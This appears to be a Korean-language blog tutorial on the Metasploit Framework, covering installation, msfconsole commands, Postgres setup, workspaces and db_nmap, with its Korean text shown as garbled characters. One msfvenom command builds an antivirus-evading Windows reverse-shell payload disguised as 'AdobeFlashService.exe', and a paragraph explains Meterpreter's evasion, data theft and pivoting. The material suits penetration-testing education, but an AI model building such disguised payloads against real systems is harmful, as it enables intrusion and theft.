Metasploit Framework

๐Ÿ” Introduction

Metasploit์€ ๋Œ€ํ‘œ์ ์ธ Penetration testing framework๋กœ Recon, Scan, Exploit ๋“ฑ Pentest์˜ ๊ธฐ์ˆ ์ ์ธ ๋ถ€๋ถ„์„ ๋งŽ์ด ์ปค๋ฒ„ํ•  ์ˆ˜ ์žˆ๋Š” ๋„๊ตฌ์ž…๋‹ˆ๋‹ค. H.D Moore๊ฐ€ ์ดˆ๊ธฐ ๊ฐœ๋ฐœํ•˜์˜€์œผ๋ฉฐ, ํ˜„์žฌ๋Š” Rapid7์—์„œ ๊ด€๋ฆฌ๋˜๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค.

Perl -> Ruby

Network ๊ธฐ๋ฐ˜ ํ…Œ์ŠคํŒ…์— ๊ต‰์žฅํžˆ ๋Šฅํ•œ ๋„๊ตฌ์ด๋ฉฐ ๊ณต๊ฐœ๋œ ์ทจ์•ฝ์ ๊ณผ Exploit code๋ฅผ ํ™œ์šฉํ•  ์ˆ˜ ์žˆ์–ด์„œ Pentesting ์ด์™ธ์—๋„ ๊ธฐ์—…์˜ ๋ณด์•ˆ์„ฑ์„ ํ…Œ์ŠคํŠธํ•˜๊ฑฐ๋‚˜, ๋ฒ„๊ทธ๋ฐ”์šดํ‹ฐ ๋“ฑ์—์„œ๋„ ํ™œ์šฉ๋˜๊ธฐ๋„ ํ•ฉ๋‹ˆ๋‹ค.

Installation

macOS, Linux์—์„  one-line script๋กœ ์„ค์น˜๊ฐ€ ๊ฐ€๋Šฅํ•ฉ๋‹ˆ๋‹ค. Windows๋Š” ๋ณ„๋„์˜ Installer๋กœ ์„ค์น˜๊ฐ€ ํ•„์š”ํ•˜๊ธฐ ๋•Œ๋ฌธ์— ์„ค์น˜ ๊ด€๋ จ ๋ฌธ์„œ๋ฅผ ์ฐธ๊ณ ํ•˜์‹œ๊ธฐ ๋ฐ”๋ž๋‹ˆ๋‹ค.

1
2
3
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
  chmod 755 msfinstall && \
  ./msfinstall

Structure of Tools

Metasploit framework๋Š” msfconsole์ด๋ž€ ๋Œ€ํ‘œ์ ์ธ ๋ช…๋ น ์ด์™ธ์—๋„ ์—ฌ๋Ÿฌ๊ฐ€์ง€ ๋„๊ตฌ๋“ค์„ ๋‚ด์žฅํ•˜๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค.

Type Description
msfconsole CLI Metasploit์˜ Console์ž…๋‹ˆ๋‹ค. ๋Œ€๋ถ€๋ถ„์˜ ์ž‘์—…์€ ์—ฌ๊ธฐ์„œ ์ด๋ฃจ์–ด์ง‘๋‹ˆ๋‹ค.
msfd Daemon Metasploit daemon์ž…๋‹ˆ๋‹ค.
msfdb CLI Metasploit์—์„œ ์‚ฌ์šฉํ•˜๋Š” DB๋ฅผ ์ž๋™ ์„ธํŒ…ํ•˜๋Š” ๋ช…๋ น์ž…๋‹ˆ๋‹ค.
msfrpc CLI RPC Client์ž…๋‹ˆ๋‹ค.
msfrpcd Daemon RPCd๋ฅผ ์‹คํ–‰ํ•˜๋Š” ๋ช…๋ น์ž…๋‹ˆ๋‹ค. ์ด๋ฅผ ์ด์šฉํ•˜๋ฉด Ruby์—์„œ RPC๋ฅผ ํ†ตํ•ด Metasploit๋ฅผ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.
msfupdate CLI Metasploit framework์˜ ์—…๋ฐ์ดํŠธ๋ฅผ ์œ„ํ•œ ๋ช…๋ น์ž…๋‹ˆ๋‹ค.
msfvenom CLI Payload ์ƒ์„ฑ์„ ์œ„ํ•œ ๋„๊ตฌ์ž…๋‹ˆ๋‹ค. ์ด๋ฅผ ํ†ตํ•ด ํ•œ์ค„์งœ๋ฆฌ ๋ช…๋ น์œผ๋กœ ์›ํ•˜๋Š” ์‰˜ ์ฝ”๋“œ๋ฅผ ์‹คํ–‰ํ•˜๋Š” ๋ฐ”์ด๋„ˆ๋ฆฌ ๋“ฑ์„ ๋งŒ๋“ค ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

MSFConsole

Usage

1
<Command> [ARG1 ARG2 ARG3 ...]

Core

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
?             Help menu
banner        Display an awesome metasploit banner
cd            Change the current working directory
color         Toggle color
connect       Communicate with a host
debug         Display information useful for debugging
exit          Exit the console
features      Display the list of not yet released features that can be opted in to
get           Gets the value of a context-specific variable
getg          Gets the value of a global variable
grep          Grep the output of another command
help          Help menu
history       Show command history
load          Load a framework plugin
quit          Exit the console
repeat        Repeat a list of commands
route         Route traffic through a session
save          Saves the active datastores
sessions      Dump session listings and display information about sessions
set           Sets a context-specific variable to a value
setg          Sets a global variable to a value
sleep         Do nothing for the specified number of seconds
spool         Write console output into a file as well the screen
threads       View and manipulate background threads
tips          Show a list of useful productivity tips
unload        Unload a framework plugin
unset         Unsets one or more context-specific variables
unsetg        Unsets one or more global variables
version       Show the framework and console library version numbers

Use Modules

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
advanced      Displays advanced options for one or more modules
back          Move back from the current context
clearm        Clear the module stack
favorite      Add module(s) to the list of favorite modules
info          Displays information about one or more modules
listm         List the module stack
loadpath      Searches for and loads modules from a path
options       Displays global options or for one or more modules
popm          Pops the latest module off the stack and makes it active
previous      Sets the previously loaded module as the current module
pushm         Pushes the active or list of modules onto the module stack
reload_all    Reloads all modules from all defined module paths
search        Searches module names and descriptions
show          Displays modules of a given type, or all modules
use           Interact with a module by name or search term/index

With Database

1
2
3
4
5
6
7
8
9
db_connect        Connect to an existing data service
db_disconnect     Disconnect from the current data service
db_export         Export a file containing the contents of the database
db_import         Import a scan result file (filetype will be auto-detected)
db_nmap           Executes nmap and records the output automatically
db_rebuild_cache  Rebuilds the database-stored module cache (deprecated)
db_remove         Remove the saved data service entry
db_save           Save the current data service connection as the default to reconnect on startup
db_status         Show the current data service status

Metasploit์€ ๊ธฐ๋ณธ์œผ๋ก  Postgres์„ ์‚ฌ์šฉํ•ฉ๋‹ˆ๋‹ค. ๋ฌผ๋ก  config ์„ค์ •์— ๋”ฐ๋ผ MySQL ๋“ฑ ๋‹ค๋ฅธ Database ์‚ฌ์šฉ๋„ ๊ฐ€๋Šฅํ•ฉ๋‹ˆ๋‹ค.

Set-up Postgres

๋จผ์ € Postgres ๊ณ„์ • ์ƒ์„ฑ์„ ์œ„ํ•ด postgres ๊ณ„์ •์œผ๋กœ ์ „ํ™˜ํ•ฉ๋‹ˆ๋‹ค. ์ดํ›„ createuser๋กœ metasploit์„ ์œ„ํ•œ ๊ณ„์ •์„ ์ƒ์„ฑํ•ฉ๋‹ˆ๋‹ค.

1
2
su - postgres
createuser msfuser -P

๊ทธ๋‹ค์Œ database๋ฅผ ์ƒ์„ฑํ•˜๊ณ  ๋งŒ๋“  ๊ณ„์ •์— ๊ถŒํ•œ์„ ์ค๋‹ˆ๋‹ค.

1
createdb --owner=msfuser hahwul_database

MSF Connect to DB

1
2
msf6 > db_connect msfuser:yourpassword@127.0.0.1:5432/hahwul_database
[*] Rebuilding the module cache in the background...
1
2
msf6 > db_status
[*] Connected to msf. Connection type: postgresql.

DB ์—ฐ๊ฒฐ ์ดํ›„๋ถ€ํ„ด db_* ๋ช…๋ น๊ณผ workspace ๊ด€๋ จ ๋ช…๋ น์„ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

Automated connect

msf home ๋””๋ ‰ํ† ๋ฆฌ ๋‚ด ./config/database.yml ํŒŒ์ผ์—์„œ ๋ฏธ๋ฆฌ Database์— ๋Œ€ํ•œ ์„ค์ •์„ ์ง€์ •ํ•˜๊ณ , MSF ์‚ฌ์šฉ์‹œ ์ž๋™์œผ๋กœ ๋กœ๋“œ๋˜๋„๋ก ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
config ํ•˜๋‹จ์— ํŒŒ์ผ์„ ๋กœ๋“œํ•˜๋ฉด DB ์—ฐ๊ฒฐ์ •๋ณด๊ฐ€ ๋‚˜์˜ค๊ณ  ์•„๋ž˜์™€ ๊ฐ™์ด ์ž‘์„ฑํ•ด์ฃผ์‹œ๋ฉด ๋ฉ๋‹ˆ๋‹ค.
 development: &pgsql
  adapter: postgresql   
  database: DB ์ด๋ฆ„
   username: DB ์œ ์ € ์ด๋ฆ„(postgres ์—์„œ ๋งŒ๋“  ๊ณ„์ •)
   password: ์œ„ ๊ณ„์ •์˜ ํŒจ์Šค์›Œ๋“œ
   host: localhost
   port: 5432      # ๋ณ€๊ฒฝํ•˜์…จ๋‹ค๋ฉด ๋ณ€๊ฒฝํ•˜์‹  ํฌํŠธ๋กœ ์ž‘์„ฑํ•ด์ฃผ์„ธ์š”.
   pool: 5
   timeout: 5

Workspace

Basic

Show list

1
2
msf6 > workspace
* default

Add

1
2
3
4
5
6
msf6 > workspace -a target
[*] Added workspace: target
[*] Workspace: target
msf6 > workspace
  default
* target

Hosts

ํ˜„์žฌ workspace์— ์ถ”๊ฐ€๋œ hosts๋ฅผ ํ™•์ธํ•ฉ๋‹ˆ๋‹ค. host ์ •๋ณด๋Š” hosts ๋ช…๋ น์ด๋‚˜ ์•„๋ž˜ db_* command๋ฅผ ํ†ตํ•ด ์ถ”๊ฐ€ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

1
2
3
4
5
6
7
8
msf6 > hosts

Hosts
=====

address    mac  name       os_name  os_flavor  os_sp  purpose  info  comments
-------    ---  ----       -------  ---------  -----  -------  ----  --------
127.0.0.1       localhost  Unknown                    device
1
2
msf6 > hosts -a 192.168.0.24
[*] Time: 2022-06-19 14:10:32 UTC Host: host=192.168.0.24

Services

workspace์— ๋ˆ„์ ๋œ services ๋ฆฌ์ŠคํŠธ๋ฅผ ํ™•์ธํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. services ๋ช…๋ น์„ ํ†ตํ•ด ์ถ”๊ฐ€ํ•˜๊ฑฐ๋‚˜ db_nmap ๋“ฑ ํฌํŠธ, ์„œ๋น„์Šค ์ •๋ณด๋ฅผ ์ถ”๊ฐ€ํ•˜๋Š” ๋ช…๋ น์„ ํ†ตํ•ด ์ถ”๊ฐ€ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
msf6 > services
Services
========

host       port  proto  name             state  info
----       ----  -----  ----             -----  ----
127.0.0.1  22    tcp    ssh              open
127.0.0.1  5000  tcp    upnp             open
127.0.0.1  7000  tcp    afs3-fileserver  open
127.0.0.1  8080  tcp    http-proxy       open

db_* Commands

db_ ๋กœ ์‹œ์ž‘ํ•˜๋Š” ๋ช…๋ น์€ ๊ฒฐ๊ณผ๋ฅผ Database์— ์ฒ˜๋ฆฌํ•˜๋Š” ๋ช…๋ น์–ด์ž…๋‹ˆ๋‹ค. ๋Œ€ํ‘œ์ ์œผ๋กœ db_nmap์ด ์žˆ์œผ๋ฉฐ ์•„๋ž˜์™€ ๊ฐ™์ด nmap์ด ์•„๋‹Œ db_nmap์œผ๋กœ ๋Œ€์ƒ์„ ์Šค์บ”ํ•˜๋Š” ๊ฒฝ์šฐ ๊ฒฐ๊ณผ๊ฐ€ Database์— ์Œ“์—ฌ workspace์—์„œ ํ™•์ธํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
msf6 > db_nmap -PN 192.168.0.4
...snip..

msf6 > services
Services
========

host         port  proto  name             state  info
----         ----  -----  ----             -----  ----
192.168.0.4  22    tcp    ssh              open
192.168.0.4  5000  tcp    upnp             open
192.168.0.4  7000  tcp    afs3-fileserver  open

MSFVenom

MSFVenom์€ Exploit ์ฝ”๋“œ ์ƒ์„ฑ์„ ์œ„ํ•œ CLI ๋„๊ตฌ๋กœ Metasploit์—์„œ ์‚ฌ์šฉํ•˜๋Š” Metepreter ๋˜๋Š” ๊ธฐ๋ณธ Shell ๋“ฑ์„ ๋‚ด์žฅํ•œ ์ฝ”๋“œ๋ฅด ์ƒ์„ฑํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์—ฌ๋Ÿฌ ํƒ€์ž…์˜ ์–ธ์–ด์™€ ํฌ๋งท์„ ์ง€์›ํ•˜๋ฉฐ, MSFConsole๊ณผ ์‰ฝ๊ฒŒ ์—ฐ๋™ํ•  ์ˆ˜ ์žˆ์–ด ํ™œ์šฉ์„ฑ์ด ๋†’์Šต๋‹ˆ๋‹ค.

1
2
3
4
msfvenom -x app.exe \
-p windows/shell/reverse_tcp \
-e x86/shikata_ga_nai -k -f exe \
-i 25 LHOST=xxx.xxx.xxx.xxx LPORT=4444 > AdobeFlashService.exe

exe, py, sh ๋ฟ๋งŒ ์•„๋‹ˆ๋ผ apk ๋“ฑ ์—ฌ๋Ÿฌ OS์— ๋Œ€ํ•ด ์ง€์›ํ•ฉ๋‹ˆ๋‹ค.

Metepreter

Metepreter๋Š” Metasploit์—์„œ ์ œ๊ณตํ•˜๋Š” Shell framework๋กœ bash, sh ์™€ ๊ฐ™์€ ์‹œ์Šคํ…œ ์‰˜๋ณด๋‹ค ํ•ดํ‚น์— ํ•„์š”ํ•œ ๊ธฐ๋Šฅ๋“ค์„ ๋งŽ์ด ๋‹ด๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค. ๊ธฐ๋ณธ์ ์œผ๋กœ ๋ฐฑ์‹  ํƒ์ง€๋ฅผ ์šฐํšŒํ•˜๊ธฐ ์œ„ํ•ด fireless๋กœ ๋™์ž‘ํ•˜๋ฉฐ ๋‚ด์žฅ๋œ ๊ธฐ๋Šฅ๋“ค์„ ์ด์šฉํ•˜์—ฌ ๋Œ€์ƒ์˜ ์ •๋ณด๋ฅผ ํƒˆ์ทจํ•˜๊ฑฐ๋‚˜ ์‰ฝ๊ฒŒ Local exploit์„ ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ๊ณ  Pivoting์œผ๋กœ Vertical/Horizon ๋‹จ์˜ Host ๋“ค์„ ์ถ”๊ฐ€๋กœ ๊ณต๊ฒฉํ•˜์—ฌ ์ ์ฐจ ์‹œ์Šคํ…œ์„ ์žฅ์•…ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

Customize

๐Ÿ•น Tools

๐Ÿ“š Articles

ZAP๊ณผ ๋น„์Šทํ•˜๊ฒŒ Metasploit๋„ ์ œ๊ฐ€ ์ž‘์„ฑํ•œ ๊ธ€์ด ๋งŽ์€ํŽธ์ž…๋‹ˆ๋‹ค. ์•„๋ž˜ ํŽ˜์ด์ง€๋ฅผ ์ฐธ๊ณ ํ•ด์ฃผ์„ธ์š”.

https://www.hahwul.com/categories/metasploit/

๐Ÿ“Œ References

Licensed under CC BY-NC-SA 4.0